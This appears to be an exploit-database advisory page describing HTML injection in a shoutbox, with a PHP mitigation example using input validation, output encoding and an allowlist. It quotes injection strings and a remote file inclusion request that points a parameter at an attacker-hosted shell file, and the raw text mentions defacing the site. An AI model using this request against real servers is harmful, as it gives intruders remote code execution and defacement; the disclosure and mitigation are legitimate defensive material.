Vendor: N/A
By: andresg888
CVSS: 8.8 (HIGH)
Type: HTML Injection
CWE: 79
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

HTML Injection Vulnerability

In the shoutbox, typing <font color="red">red text</font> or <marquee>hi</marquee> is enough to exploit the vulnerability. The advisory also lists the request http://server/[path]/include/prodler.class.php?sPath=http://attacker.com/shell.txt??? as an exploit.

Mitigation:

Input validation and output encoding should be used to prevent HTML injection.
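
One way to apply both controls in the shoutbox, as an added example that is not code from the affected application or the advisory. The function names, the 200-character limit and the allowlist entry are hypothetical, and the sPath handling assumes the parameter selects a file to load, which the page does not state.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers; the application's real code is not shown on the page.
// Requires PHP 7.4+ with the mbstring extension.

/** Input validation: accept only well-formed UTF-8 text of bounded length. */
function validate_shout(string $raw, int $maxLen = 200): ?string
{
    if (!mb_check_encoding($raw, 'UTF-8')) {
        return null;
    }
    // Reject control characters other than tab and newline.
    if (preg_match('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', $raw) === 1) {
        return null;
    }
    $msg = trim($raw);
    if ($msg === '' || mb_strlen($msg, 'UTF-8') > $maxLen) {
        return null;
    }
    return $msg; // stored as typed; markup is neutralised when rendered
}

/** Output encoding: markup characters become entities at render time. */
function render_shout(string $author, string $msg): string
{
    $enc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<li><b>' . $enc($author) . ':</b> ' . nl2br($enc($msg)) . '</li>';
}

/** Assumption: sPath names a file to load; resolve it through a fixed allowlist. */
function resolve_spath(string $sPath): ?string
{
    $allowed = ['shoutbox' => __DIR__ . '/include/shoutbox.php']; // constructed entry
    return $allowed[$sPath] ?? null; // URLs and unknown keys resolve to null
}

// Constructed sample input, including the two strings quoted in the advisory.
$samples = ['<font color="red">red text</font>', '<marquee>hi</marquee>', "hi\x00there"];
foreach ($samples as $raw) {
    $msg = validate_shout($raw);
    echo $msg === null ? "rejected\n" : render_shout('guest', $msg) . "\n";
}
var_dump(resolve_spath('http://attacker.com/shell.txt???'));
```

Encoding at render time, rather than stripping tags on input, keeps the stored message intact and makes the browser display the markup as literal text.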
Source

Exploit-DB raw data:

##########################[andresg888]##########################
#Web: www.ilegalintrusion.net & www.bl4ck-p0rtal.org
########################################################################
#Exploit :
# Go to the shoutbox and type:
# <font color="red">red text</font>
# or
# <marquee>hi</marquee>
# or
# 
########################################################################
#3xplo!t :
#http://server/[path]/include/prodler.class.php?sPath=http://attacker.com/shell.txt???
########################################################################
#Greetz : _84kur10_ , Brunos_50
#Special Thanks : all members from ilegalintrusion & black-portal
########################################################################
# It is obvious that if you allow JavaScript or HTML injection, code can make a document.Inner
# so with a little imagination one could deface the site with a script.
###########################[andresg888]#################################